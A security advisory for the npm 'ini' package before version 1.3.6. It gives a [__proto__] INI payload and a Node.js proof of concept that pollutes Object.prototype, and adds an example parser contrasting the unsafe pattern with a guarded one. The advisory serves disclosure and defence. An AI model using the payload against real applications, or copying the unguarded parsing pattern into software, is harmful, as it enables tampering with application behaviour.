Severity: low

Prototype Pollution

ini

Overview

ini before version 1.3.6 has a Prototype Pollution vulnerability.

Impact

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the object prototype in the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini:

[__proto__]
polluted = "polluted"

poc.js:

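var fs = require('fs')
var ini = require('ini')

// Parsing the [__proto__] section writes its keys onto Object.prototype
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
// A fresh, unrelated object inherits the polluted key
console.log({}.__proto__)
// The bare identifier resolves through the global object's prototype chain
console.log(polluted)

> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted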

Remediation

Upgrade to version 1.3.6 or later.
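
Why a `[__proto__]` section reaches `Object.prototype`, and one way a parser can refuse it, shown as an added example (not code from the ini package or from this advisory). `parseIni`, `RESERVED`, `demo` and the `[db]` section are hypothetical names, and the parser is a simplified stand-in that handles only section headers and `key = value` lines.

```javascript
'use strict'
// Simplified INI parser written for this example; not the ini package's code.
const RESERVED = new Set(['__proto__', 'constructor', 'prototype'])

// Strip optional surrounding double quotes from a value.
function unquote (v) {
  return /^".*"$/.test(v) ? v.slice(1, -1) : v
}

// Parse "[section]" headers and "key = value" lines.
// guard=false reproduces the unsafe pattern: on a plain object,
// out['__proto__'] resolves to Object.prototype instead of creating a key.
function parseIni (text, guard = true) {
  const out = guard ? Object.create(null) : {}
  let target = out
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim()
    if (!line || line.startsWith(';') || line.startsWith('#')) continue
    const section = line.match(/^\[([^\]]*)\]$/)
    if (section) {
      const name = section[1].trim()
      if (guard && RESERVED.has(name)) { target = null; continue } // drop the section
      target = out[name] = out[name] || (guard ? Object.create(null) : {})
      continue
    }
    const kv = line.match(/^([^=]+)=(.*)$/)
    if (!kv || target === null) continue
    const key = kv[1].trim()
    if (guard && RESERVED.has(key)) continue // never write a reserved key
    target[key] = unquote(kv[2].trim())
  }
  return out
}

// Constructed sample input: the advisory's payload plus one benign section.
const SAMPLE = '[__proto__]\npolluted = "polluted"\n\n[db]\nhost = "localhost"\n'

// Run both modes and report whether Object.prototype was modified.
function demo () {
  parseIni(SAMPLE, false)
  const unguardedPolluted = ({}).polluted === 'polluted'
  delete Object.prototype.polluted // clean up before the guarded run
  const safe = parseIni(SAMPLE, true)
  return { unguardedPolluted, guardedPolluted: 'polluted' in {}, host: safe.db.host }
}

console.log(demo())
```

The guarded mode combines two independent defences: a null-prototype container, so `__proto__` has no special meaning on the result, and a reserved-name filter on both section names and keys.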

Advisory timeline

  1. published

    Advisory Published
    Dec 10th, 2020
  2. reported

    Reported by Gur Shafriri on Snyk Security Team
    Dec 9th, 2020